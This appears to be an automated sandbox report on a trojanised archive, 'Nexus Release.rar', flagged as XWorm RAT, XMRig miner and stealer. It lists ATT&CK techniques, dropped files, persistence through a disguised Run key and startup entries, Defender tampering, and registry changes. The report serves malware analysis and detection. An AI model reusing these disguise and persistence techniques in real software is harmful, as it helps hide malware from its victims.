Malware Analysis Report

2024-09-11 14:48

Sample ID 240612-f5tv3asaph
Target Nexus Release.rar
SHA256 b895ad7a2e10bc61670d50322612490e99a66cfd95a7a005a7ce5662617083f5
Tags
xmrig xworm evasion execution miner persistence rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b895ad7a2e10bc61670d50322612490e99a66cfd95a7a005a7ce5662617083f5

Threat Level: Known bad

The file Nexus Release.rar was found to be: Known bad.

Malicious Activity Summary

xmrig xworm evasion execution miner persistence rat spyware stealer trojan upx

Detect Xworm Payload

Contains code to disable Windows Defender

xmrig

Xworm

XMRig Miner payload

Stops running service(s)

Creates new service(s)

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

UPX packed file

Drops startup file

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Kills process with taskkill

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
System Services
T1569
Service Execution
T1569.002
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Impair Defenses
T1562
Modify Registry
T1112
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Service Stop
T1489
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-12 05:27

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 05:27

Reported

2024-06-12 05:58

Platform

win10-20240404-en

Max time kernel

315s

Max time network

1576s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Nexus Release\ByfronHook.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Nexus Release\ByfronHook.dll",#1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 05:27

Reported

2024-06-12 05:30

Platform

win10-20240404-en

Max time kernel

146s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.7.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nexus Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ekpzom.exe N/A
N/A N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe N/A
N/A N/A C:\ProgramData\Windows Runtime.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sowzuw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\ProgramData\Windows Runtime.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2264_133626437597384768\.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2632 set thread context of 4248 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\conhost.exe
PID 2632 set thread context of 5064 N/A C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe C:\Windows\system32\svchost.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\onefile_1840_133626436838258259\.exe N/A
